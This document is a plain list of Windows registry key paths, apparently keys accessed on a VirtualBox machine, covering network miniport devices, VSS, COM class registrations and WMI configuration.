HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{8E301A52-AFFA-4F49-B9CA-C79096A1A056}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPPOEMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{DF4A9D2C-8742-4EB1-8703-D395C4183F33}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_PPTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{71F897D7-EB7C-4D8D-89DB-AC80D9DD2270}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_SSTPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#SYSTEM#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{83da6326-97a6-4088-9453-a1923f573b29}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000006
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Pnp\{71d10298-bdb9-4dcd-a87a-eec6137ab254}\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{EEAB7790-C514-11D1-B42B-00805FC1270E}\ASYNCMAC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ContainerID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Legacy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CompatibleIDs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\#\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{cac88484-7515-4c03-82e6-71a87abac361}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\LastUpdateTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyCacheDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PerHwIdStorage\SW#{eeab7790-c514-11d1-b42b-00805fc1270e}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\CustomPropertyHwIdKey
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Device Parameters\DeviceGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\SYSTEM\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\SYSTEM\0000\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{78032B7E-4968-42D3-9F37-287EA86C0AAA}\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\BTH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_AGILEVPNMINIPORT\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_AGILEVPNMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_L2TPMINIPORT\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_L2TPMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SW\{eeab7790-c514-11d1-b42b-00805fc1270e}\asyncmac\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANBH\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANBH\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANIP\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIP\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_NDISWANIPV6\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_NDISWANIPV6\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPPOEMINIPORT\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPPOEMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_PPTPMINIPORT\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPTPMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_PPTPMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\FriendlyName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18\DeviceDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\MS_SSTPMINIPORT\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_SSTPMINIPORT\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\MS_SSTPMINIPORT\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\*ISATAP\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\*ISATAP\0000\Phantom
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\*ISATAP\0000\Driver
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\DeviceDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\system\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\LastServiceStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\MOF Self-Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{2A155EBB-BCFD-4F29-88A3-08553ADF9C3C}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{3C923BA9-19EA-4497-BDBA-F6B7C645C82F}\MarshaledProxy
